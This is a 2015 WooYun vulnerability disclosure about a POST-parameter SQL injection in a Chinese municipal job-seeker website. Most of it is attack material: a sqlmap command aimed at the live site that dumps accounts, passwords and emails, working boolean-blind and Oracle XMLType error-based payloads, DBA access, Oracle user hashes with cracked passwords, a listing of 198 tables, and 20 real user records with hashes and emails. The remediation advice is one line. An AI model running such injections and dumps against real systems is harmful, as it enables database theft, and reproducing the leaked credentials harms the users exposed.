当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152059

漏洞标题:菊城人才网某处存在高危POST型SQL注射漏洞(DBA权限/大量系统管理员密码泄露/198个表/17万用户密码及邮箱泄露)

相关厂商:菊城人才网

漏洞作者: 慢慢

提交时间:2015-11-05 15:58

修复时间:2015-12-24 11:08

公开时间:2015-12-24 11:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-05: 细节已通知厂商并且等待厂商处理中
2015-11-09: 厂商已经确认,细节仅向厂商公开
2015-11-19: 细节向核心白帽子及相关领域专家公开
2015-11-29: 细节向普通白帽子公开
2015-12-09: 细节向实习白帽子公开
2015-12-24: 细节向公众公开

简要描述:

中山市菊城人才市场是于2003年经中山市人事局批准成立的,是中山市小榄镇政府对外的一个服务窗口,是镇属集体企业,着力解决用工和就业问题,直属小榄镇委组织人事办公室管辖。它以"为社会经济建设服务,为用人单位服务,为各类人才服务"为宗旨,向社会提供全面、高效的人才服务。
中山市菊城人才市场拥有先进、齐备的软硬件设施。市场内不但有自动化办公设备及管理系统,滚动式发布招聘信息的电子屏幕,还设置了办公室、业务室、资料室、招聘信息浏览区等,同时拥有一批熟悉业务、待人热情、尽职尽责的从业人员。主要业务包括:人才招聘、求职服务、人才推荐、网络招聘、人才测评、人才租赁、猎头、人才培训、户口托管,代办毕业生报到手续、转正定级、职称评审等业务。
中山市菊城人才市场将以服务为宗旨,以用户为中心,以创新为动力,不断拓展业务。我们将全方位、多渠道、专业化、系统化地拓展各项业务,以"为企业搜寻一流人才,为人才配备最佳岗位"为已任,整合人才资源,盘活人才存量,为推动社会经济发展作贡献。以“您找到工作是我们最大的快乐”和“您的满意是我们最大的动力”作为我们工作的座右铭。

详细说明:

地址:http://**.**.**.**:80/person/search.action

python sqlmap.py -u "http://**.**.**.**:80/person/search.action" --form --batch --random-agent -p workAreaCode3 --technique=BE -D SYSTEM -T T_P_account -CACCOUNT,PASSWORD,EMAIL --dump --threads=10


back-end DBMS: Oracle
Database: SYSTEM
+-------------+---------+
| Table       | Entries |
+-------------+---------+
| T_P_ACCOUNT | 175723  |
+-------------+---------+

漏洞证明:

---
Parameter: workAreaCode3 (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ahq=1&workAreaCode3=2009000100030001%' AND 7883=7883 AND '%'='
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: ahq=1&workAreaCode3=2009000100030001%' AND 6819=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(107)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (6819=6819) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(107)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='
---
web application technology: JSP
back-end DBMS: Oracle
current user:    'SYSTEM'
current user is DBA:    True
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: workAreaCode3 (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ahq=1&workAreaCode3=2009000100030001%' AND 7883=7883 AND '%'='
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: ahq=1&workAreaCode3=2009000100030001%' AND 6819=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(107)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (6819=6819) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(107)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='
---
web application technology: JSP
back-end DBMS: Oracle
database management system users [22]:
[*] ANONYMOUS
[*] CTXSYS
[*] DBSNMP
[*] DIP
[*] DMSYS
[*] EXFSYS
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] OLAPSYS
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SI_INFORMTN_SCHEMA
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TEST
[*] TSMSYS
[*] WMSYS
[*] XDB
database management system users password hashes:
[*] _NEXT_USER [1]:
    password hash: NULL
[*] ANONYMOUS [1]:
    password hash: anonymous
[*] AQ_ADMINISTRATOR_ROLE [1]:
    password hash: NULL
[*] AQ_USER_ROLE [1]:
    password hash: NULL
[*] AUTHENTICATEDUSER [1]:
    password hash: NULL
[*] CONNECT [1]:
    password hash: NULL
[*] CTXAPP [1]:
    password hash: NULL
[*] CTXSYS [1]:
    password hash: 71E687F036AD56E5
    clear-text password: CHANGE_ON_INSTALL
[*] DBA [1]:
    password hash: NULL
[*] DBSNMP [1]:
    password hash: 183A988BF33F09FE
[*] DELETE_CATALOG_ROLE [1]:
    password hash: NULL
[*] DIP [1]:
    password hash: CE4A36B8E06CA59C
    clear-text password: DIP
[*] DMSYS [1]:
    password hash: BFBA5A553FD9E28A
    clear-text password: DMSYS
[*] EJBCLIENT [1]:
    password hash: NULL
[*] EXECUTE_CATALOG_ROLE [1]:
    password hash: NULL
[*] EXFSYS [1]:
    password hash: 66F4EF5650C20355
    clear-text password: EXFSYS
[*] EXP_FULL_DATABASE [1]:
    password hash: NULL
[*] GATHER_SYSTEM_STATISTICS [1]:
    password hash: NULL
[*] GLOBAL_AQ_USER_ROLE [1]:
    password hash: GLOBAL
[*] HS_ADMIN_ROLE [1]:
    password hash: NULL
[*] IMP_FULL_DATABASE [1]:
    password hash: NULL
[*] JAVA_ADMIN [1]:
    password hash: NULL
[*] JAVA_DEPLOY [1]:
    password hash: NULL
[*] JAVADEBUGPRIV [1]:
    password hash: NULL
[*] JAVAIDPRIV [1]:
    password hash: NULL
[*] JAVASYSPRIV [1]:
    password hash: NULL
[*] JAVAUSERPRIV [1]:
    password hash: NULL
[*] LOGSTDBY_ADMINISTRATOR [1]:
    password hash: NULL
[*] MDDATA [1]:
    password hash: DF02A496267DEE66
    clear-text password: MDDATA
[*] MDSYS [1]:
    password hash: 72979A94BAD2AF80
    clear-text password: MDSYS
[*] MGMT_USER [1]:
    password hash: NULL
[*] MGMT_VIEW [1]:
    password hash: 442167C25FAC883C
[*] OEM_ADVISOR [1]:
    password hash: NULL
[*] OEM_MONITOR [1]:
    password hash: NULL
[*] OLAP_DBA [1]:
    password hash: NULL
[*] OLAP_USER [1]:
    password hash: NULL
[*] OLAPSYS [1]:
    password hash: 3FB8EF9DB538647C
    clear-text password: MANAGER
[*] ORDPLUGINS [1]:
    password hash: 88A2B2C183431F00
    clear-text password: ORDPLUGINS
[*] ORDSYS [1]:
    password hash: 7EFA02EC7EA6B86F
    clear-text password: ORDSYS
[*] OUTLN [1]:
    password hash: 4A3BA55E08595C81
    clear-text password: OUTLN
[*] PUBLIC [1]:
    password hash: NULL
[*] RECOVERY_CATALOG_OWNER [1]:
    password hash: NULL
[*] RESOURCE [1]:
    password hash: NULL
[*] SCHEDULER_ADMIN [1]:
    password hash: NULL
[*] SCOTT [1]:
    password hash: F894844C34402B67
    clear-text password: TIGER
[*] SELECT_CATALOG_ROLE [1]:
    password hash: NULL
[*] SI_INFORMTN_SCHEMA [1]:
    password hash: 84B8CBCA4D477FA3
    clear-text password: SI_INFORMTN_SCHEMA
[*] SYS [1]:
    password hash: 56E94F231243B89C
[*] SYSMAN [1]:
    password hash: B4338BF230740CA3
[*] SYSTEM [1]:
    password hash: 5216C721FAA674C6
[*] TEST [1]:
    password hash: 483A017BEDCEEDA0
    clear-text password: PASSWORD
[*] TSMSYS [1]:
    password hash: 3DF26A8B17D0F29F
    clear-text password: TSMSYS
[*] WM_ADMIN_ROLE [1]:
    password hash: NULL
[*] WMSYS [1]:
    password hash: 7C9BA362F8314299
    clear-text password: WMSYS
[*] XDB [1]:
    password hash: 88D8364765FCE6AF
    clear-text password: CHANGE_ON_INSTALL
[*] XDBADMIN [1]:
    password hash: NULL
[*] XDBWEBSERVICES [1]:
    password hash: NULL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: workAreaCode3 (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ahq=1&workAreaCode3=2009000100030001%' AND 7883=7883 AND '%'='
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: ahq=1&workAreaCode3=2009000100030001%' AND 6819=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(107)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (6819=6819) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(107)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='
---
web application technology: JSP
back-end DBMS: Oracle
available databases [16]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TEST
[*] TSMSYS
[*] WMSYS
[*] XDB
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: workAreaCode3 (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ahq=1&workAreaCode3=2009000100030001%' AND 7883=7883 AND '%'='
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: ahq=1&workAreaCode3=2009000100030001%' AND 6819=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(107)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (6819=6819) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(107)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='
---
web application technology: JSP
back-end DBMS: Oracle
Database: SYSTEM
[198 tables]
+-------------------------------+
| AQ$_INTERNET_AGENTS           |
| AQ$_INTERNET_AGENT_PRIVS      |
| AQ$_QUEUES                    |
| AQ$_QUEUE_TABLES              |
| AQ$_SCHEDULES                 |
| BASE_INFO                     |
| DEF$_AQCALL                   |
| DEF$_AQERROR                  |
| DEF$_CALLDEST                 |
| DEF$_DEFAULTDEST              |
| DEF$_DESTINATION              |
| DEF$_ERROR                    |
| DEF$_LOB                      |
| DEF$_ORIGIN                   |
| DEF$_PROPAGATOR               |
| DEF$_PUSHED_TRANSACTIONS      |
| DEF$_TEMP$LOB                 |
| HELP                          |
| JOBCOMPLETTER                 |
| JOBCOMPLETTER                 |
| JOBUSERLETTER                 |
| LOGMNRC_DBNAME_UID_MAP        |
| LOGMNRC_GSII                  |
| LOGMNRC_GTCS                  |
| LOGMNRC_GTLO                  |
| LOGMNRP_CTAS_PART_MAP         |
| LOGMNRT_MDDL$                 |
| LOGMNR_AGE_SPILL$             |
| LOGMNR_ATTRCOL$               |
| LOGMNR_ATTRIBUTE$             |
| LOGMNR_CCOL$                  |
| LOGMNR_CDEF$                  |
| LOGMNR_COL$                   |
| LOGMNR_COLTYPE$               |
| LOGMNR_DICTIONARY$            |
| LOGMNR_DICTSTATE$             |
| LOGMNR_ERROR$                 |
| LOGMNR_FILTER$                |
| LOGMNR_HEADER1$               |
| LOGMNR_HEADER2$               |
| LOGMNR_ICOL$                  |
| LOGMNR_IND$                   |
| LOGMNR_INDCOMPART$            |
| LOGMNR_INDPART$               |
| LOGMNR_INDSUBPART$            |
| LOGMNR_LOB$                   |
| LOGMNR_LOBFRAG$               |
| LOGMNR_LOG$                   |
| LOGMNR_OBJ$                   |
| LOGMNR_PARAMETER$             |
| LOGMNR_PROCESSED_LOG$         |
| LOGMNR_RESTART_CKPT$          |
| LOGMNR_RESTART_CKPT_TXINFO$   |
| LOGMNR_SESSION$               |
| LOGMNR_SESSION_EVOLVE$        |
| LOGMNR_SPILL$                 |
| LOGMNR_TAB$                   |
| LOGMNR_TABCOMPART$            |
| LOGMNR_TABPART$               |
| LOGMNR_TABSUBPART$            |
| LOGMNR_TS$                    |
| LOGMNR_TYPE$                  |
| LOGMNR_UID$                   |
| LOGMNR_USER$                  |
| LOGSTDBY$APPLY_MILESTONE      |
| LOGSTDBY$APPLY_PROGRESS       |
| LOGSTDBY$EVENTS               |
| LOGSTDBY$HISTORY              |
| LOGSTDBY$PARAMETERS           |
| LOGSTDBY$PLSQL                |
| LOGSTDBY$SCN                  |
| LOGSTDBY$SKIP                 |
| LOGSTDBY$SKIP_SUPPORT         |
| LOGSTDBY$SKIP_TRANSACTION     |
| MVIEW$_ADV_AJG                |
| MVIEW$_ADV_BASETABLE          |
| MVIEW$_ADV_CLIQUE             |
| MVIEW$_ADV_ELIGIBLE           |
| MVIEW$_ADV_EXCEPTIONS         |
| MVIEW$_ADV_FILTER             |
| MVIEW$_ADV_FILTERINSTANCE     |
| MVIEW$_ADV_FJG                |
| MVIEW$_ADV_GC                 |
| MVIEW$_ADV_INDEX              |
| MVIEW$_ADV_INFO               |
| MVIEW$_ADV_JOURNAL            |
| MVIEW$_ADV_LEVEL              |
| MVIEW$_ADV_LOG                |
| MVIEW$_ADV_OUTPUT             |
| MVIEW$_ADV_OWB                |
| MVIEW$_ADV_PARAMETERS         |
| MVIEW$_ADV_PARTITION          |
| MVIEW$_ADV_PLAN               |
| MVIEW$_ADV_PRETTY             |
| MVIEW$_ADV_ROLLUP             |
| MVIEW$_ADV_SQLDEPEND          |
| MVIEW$_ADV_TEMP               |
| MVIEW$_ADV_WORKLOAD           |
| OL$                           |
| OL$HINTS                      |
| OL$NODES                      |
| PLAN_TABLE                    |
| REPCAT$_AUDIT_ATTRIBUTE       |
| REPCAT$_AUDIT_COLUMN          |
| REPCAT$_COLUMN_GROUP          |
| REPCAT$_CONFLICT              |
| REPCAT$_DDL                   |
| REPCAT$_EXCEPTIONS            |
| REPCAT$_EXTENSION             |
| REPCAT$_FLAVORS               |
| REPCAT$_FLAVOR_OBJECTS        |
| REPCAT$_GENERATED             |
| REPCAT$_GROUPED_COLUMN        |
| REPCAT$_INSTANTIATION_DDL     |
| REPCAT$_KEY_COLUMNS           |
| REPCAT$_OBJECT_PARMS          |
| REPCAT$_OBJECT_TYPES          |
| REPCAT$_PARAMETER_COLUMN      |
| REPCAT$_PRIORITY              |
| REPCAT$_PRIORITY_GROUP        |
| REPCAT$_REFRESH_TEMPLATES     |
| REPCAT$_REPCAT                |
| REPCAT$_REPCATLOG             |
| REPCAT$_REPCOLUMN             |
| REPCAT$_REPGROUP_PRIVS        |
| REPCAT$_REPOBJECT             |
| REPCAT$_REPPROP               |
| REPCAT$_REPSCHEMA             |
| REPCAT$_RESOLUTION            |
| REPCAT$_RESOLUTION_METHOD     |
| REPCAT$_RESOLUTION_STATISTICS |
| REPCAT$_RESOL_STATS_CONTROL   |
| REPCAT$_RUNTIME_PARMS         |
| REPCAT$_SITES_NEW             |
| REPCAT$_SITE_OBJECTS          |
| REPCAT$_SNAPGROUP             |
| REPCAT$_TEMPLATE_OBJECTS      |
| REPCAT$_TEMPLATE_PARMS        |
| REPCAT$_TEMPLATE_REFGROUPS    |
| REPCAT$_TEMPLATE_SITES        |
| REPCAT$_TEMPLATE_STATUS       |
| REPCAT$_TEMPLATE_TARGETS      |
| REPCAT$_TEMPLATE_TYPES        |
| REPCAT$_USER_AUTHORIZATIONS   |
| REPCAT$_USER_PARM_VALUES      |
| SQLPLUS_PRODUCT_PROFILE       |
| TB_TEST                       |
| TEST_TB                       |
| TOAD_PLAN_TABLE               |
| T_AD_ADVERT                   |
| T_AD_AREA                     |
| T_E_DEPARTMENT                |
| T_E_ENTERPRISE                |
| T_E_FAVORITE                  |
| T_E_INTERVIEW                 |
| T_E_JOB                       |
| T_E_JOB_LOCATION              |
| T_E_JOB_TYPE                  |
| T_E_MEMBER                    |
| T_E_MESSAGE                   |
| T_E_READ_PERSON_INFO          |
| T_E_SEARCH                    |
| T_E_SEARCH_FUNC               |
| T_E_SEEN                      |
| T_E_VIEW_LOG                  |
| T_P_ACCOUNT                   |
| T_P_APPLY_POSITION            |
| T_P_BASE_INFO                 |
| T_P_CERTIFICATE               |
| T_P_CONTACT                   |
| T_P_EDUCATE_TRAIN             |
| T_P_FEEDBACK                  |
| T_P_FLAG                      |
| T_P_HOPE_AREA                 |
| T_P_HOPE_POSITION             |
| T_P_HOPE_TRADE                |
| T_P_HOUSE_KEEPING             |
| T_P_POSITION_FAVORITE         |
| T_P_SEARCHER                  |
| T_P_WORK_EXPERIENCE           |
| T_S_APPOINTMENT               |
| T_S_AUTHORITY                 |
| T_S_DICT                      |
| T_S_DOWNLOAD                  |
| T_S_DOWNLOAD_TYPE             |
| T_S_HOUSEKEEPING_APPLY        |
| T_S_HOUSEKEEPING_REQUEST      |
| T_S_HOUSEKEEPING_TYPE         |
| T_S_INFO                      |
| T_S_INFO_TYPE                 |
| T_S_LOGS                      |
| T_S_MENU                      |
| T_S_OPERATOR                  |
| T_S_RECRUITMENT               |
| T_S_RECRUITMENT_BOOK          |
| T_S_RECRUITMENT_INFO          |
| T_S_SEEN_POINT                |
| T_S_SETTING                   |
+-------------------------------+


back-end DBMS: Oracle
Database: SYSTEM
+-------------+---------+
| Table       | Entries |
+-------------+---------+
| T_P_ACCOUNT | 175723  |
+-------------+---------+


选取其中一部分进行展示:

Database: SYSTEM
Table: T_P_ACCOUNT
[20 entries]
+-------------+------------------+------------------------+
| ACCOUNT     | PASSWORD         | EMAIL                  |
+-------------+------------------+------------------------+
| liukm       | 49ba59abbe56e057 | liukaimingming@**.**.**.** |
| wuyf001     | 49ba59abbe56e057 | NULL                   |
| ningcd      | 49ba59abbe56e057 | NULL                   |
| 114171      | e83baa5a638e03c1 | 448049526@.com         |
| wuy002      | 49ba59abbe56e057 | NULL                   |
| wenxf       | 49ba59abbe56e057 | NULL                   |
| liangweizin | 5bb8b95caf0cafb3 | 414094154@**.**.**.**       |
| limh        | 49ba59abbe56e057 | NULL                   |
| tgl         | 49ba59abbe56e057 | NULL                   |
| qtt         | 49ba59abbe56e057 | NULL                   |
| zhangjs001  | 49ba59abbe56e057 | xinsi789@**.**.**.**       |
| tangshuai   | 49ba59abbe56e057 | NULL                   |
| heyl007     | 49ba59abbe56e057 | NULL                   |
| xuwh        | 49ba59abbe56e057 | wenhong1986@QQ.com     |
| mayoux      | 49ba59abbe56e057 | NULL                   |
| huangwl     | 49ba59abbe56e057 | NULL                   |
| liangyn     | 49ba59abbe56e057 | NULL                   |
| yangqx      | 49ba59abbe56e057 | NULL                   |
| alexdog     | 3a24f4c037cfa13e | ruiruishaoye@**.**.**.**   |
| rui2007     | 675b877702ec1d1a | cyjunely@**.**.**.**       |
+-------------+------------------+------------------------+

修复方案:

增加过滤。

版权声明:转载请注明来源 慢慢@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-11-09 11:06

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发对应分中心,由其后续协调网站管理单位处置。

最新状态:

暂无